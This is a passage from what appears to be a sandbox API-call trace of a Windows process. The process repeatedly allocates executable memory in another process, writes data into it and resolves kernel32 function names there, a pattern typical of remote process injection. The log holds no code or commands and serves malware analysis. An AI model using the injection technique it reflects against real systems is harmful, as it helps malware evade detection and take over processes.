lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.402] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0176.402] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.402] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cf30*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cf30*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.403] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.403] ResetEvent (hEvent=0x580) returned 1 [0176.403] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.404] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.404] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.404] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0176.404] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.404] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.404] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.404] lstrlenA (lpString="GetDiskFreeSpaceW") returned 17 [0176.404] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.405] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9d52*, nSize=0x12, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9d52*, lpNumberOfBytesWritten=0xcd978*=0x12) returned 1 [0176.406] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.406] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cd50 [0176.406] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.407] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cd50*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cd50*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.407] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.408] ResetEvent (hEvent=0x580) returned 1 [0176.408] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.408] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.408] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.408] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cd50 | out: hHeap=0x2150000) returned 1 [0176.408] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.408] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.409] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.409] lstrlenA (lpString="OutputDebugStringA") returned 18 [0176.409] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.409] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9d66*, nSize=0x13, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9d66*, lpNumberOfBytesWritten=0xcd978*=0x13) returned 1 [0176.410] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.411] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cc90 [0176.411] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.411] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cc90*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cc90*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.411] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.412] ResetEvent (hEvent=0x580) returned 1 [0176.412] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.412] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.412] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.412] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cc90 | out: hHeap=0x2150000) returned 1 [0176.412] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.413] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.413] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.413] lstrlenA (lpString="LockFile") returned 8 [0176.413] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.413] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9d7c*, nSize=0x9, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9d7c*, lpNumberOfBytesWritten=0xcd978*=0x9) returned 1 [0176.416] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.416] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c660 [0176.416] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.416] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c660*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c660*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.417] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.417] ResetEvent (hEvent=0x580) returned 1 [0176.417] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.417] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.417] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c660 | out: hHeap=0x2150000) returned 1 [0176.418] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.418] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.418] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.418] lstrlenA (lpString="SetFilePointer") returned 14 [0176.418] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.418] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9d88*, nSize=0xf, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9d88*, lpNumberOfBytesWritten=0xcd978*=0xf) returned 1 [0176.420] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.420] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.420] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.420] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c870*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c870*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.421] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.421] ResetEvent (hEvent=0x580) returned 1 [0176.421] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.422] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.422] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.422] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.422] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.422] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.422] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.422] lstrlenA (lpString="GetFullPathNameA") returned 16 [0176.423] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.423] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9d9a*, nSize=0x11, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9d9a*, lpNumberOfBytesWritten=0xcd978*=0x11) returned 1 [0176.425] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.425] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cc90 [0176.425] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.425] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cc90*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cc90*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.425] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.426] ResetEvent (hEvent=0x580) returned 1 [0176.426] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.426] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.426] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.427] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cc90 | out: hHeap=0x2150000) returned 1 [0176.427] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.427] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.427] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.427] lstrlenA (lpString="SetEndOfFile") returned 12 [0176.427] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.427] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9dae*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9dae*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.428] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.429] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0176.429] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.429] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cf30*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cf30*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.429] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.430] ResetEvent (hEvent=0x580) returned 1 [0176.430] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.430] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.430] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.430] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0176.431] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.431] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.431] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.431] lstrlenA (lpString="UnlockFileEx") returned 12 [0176.431] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.431] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9dbe*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9dbe*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.432] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.432] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c360 [0176.433] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.433] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c360*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c360*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.433] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.434] ResetEvent (hEvent=0x580) returned 1 [0176.434] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.434] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.434] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.434] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c360 | out: hHeap=0x2150000) returned 1 [0176.434] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.435] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.435] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.435] lstrlenA (lpString="GetTempPathW") returned 12 [0176.435] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.435] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9dce*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9dce*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.437] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.437] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cab0 [0176.437] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.437] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cab0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cab0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.438] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.438] ResetEvent (hEvent=0x580) returned 1 [0176.438] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.438] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.438] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.439] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cab0 | out: hHeap=0x2150000) returned 1 [0176.439] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.439] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.439] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.439] lstrlenA (lpString="CreateMutexW") returned 12 [0176.439] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.439] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9dde*, nSize=0xd, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9dde*, lpNumberOfBytesWritten=0xcd978*=0xd) returned 1 [0176.442] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.442] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c9f0 [0176.442] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.442] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c9f0*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c9f0*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.443] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.443] ResetEvent (hEvent=0x580) returned 1 [0176.443] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.443] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.443] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.444] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c9f0 | out: hHeap=0x2150000) returned 1 [0176.444] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.444] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.444] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.444] lstrlenA (lpString="WaitForSingleObject") returned 19 [0176.444] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.444] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9dee*, nSize=0x14, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9dee*, lpNumberOfBytesWritten=0xcd978*=0x14) returned 1 [0176.446] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.446] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6c870 [0176.446] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.446] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6c870*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6c870*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.447] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesWritten=0xcd888*=0xd8) returned 1 [0176.447] ResetEvent (hEvent=0x580) returned 1 [0176.447] SignalObjectAndWait (hObjectToSignal=0x5e0, hObjectToWaitOn=0x580, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0176.447] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.447] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.448] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6c870 | out: hHeap=0x2150000) returned 1 [0176.448] VirtualFreeEx (hProcess=0x5cc, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0176.448] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0176.448] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0176.448] lstrlenA (lpString="CreateFileW") returned 11 [0176.448] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0176.448] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x20000, lpBuffer=0x326f9e04*, nSize=0xc, lpNumberOfBytesWritten=0xcd978 | out: lpBuffer=0x326f9e04*, lpNumberOfBytesWritten=0xcd978*=0xc) returned 1 [0176.450] ReadProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0, nSize=0xd8, lpNumberOfBytesRead=0xcd888 | out: lpBuffer=0xcd8d0*, lpNumberOfBytesRead=0xcd888*=0xd8) returned 1 [0176.450] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6cf30 [0176.450] VirtualAllocEx (hProcess=0x5cc, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0176.450] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x1e0000, lpBuffer=0x32e6cf30*, nSize=0x20, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0x32e6cf30*, lpNumberOfBytesWritten=0xcd888*=0x20) returned 1 [0176.450] WriteProcessMemory (in: hProcess=0x5cc, lpBaseAddress=0x110000, lpBuffer=0xcd8d0*, nSize=0xd8, lpNumberOfBytesWritten=0xcd888 | out: lpBuffer=0xcd8d0*, 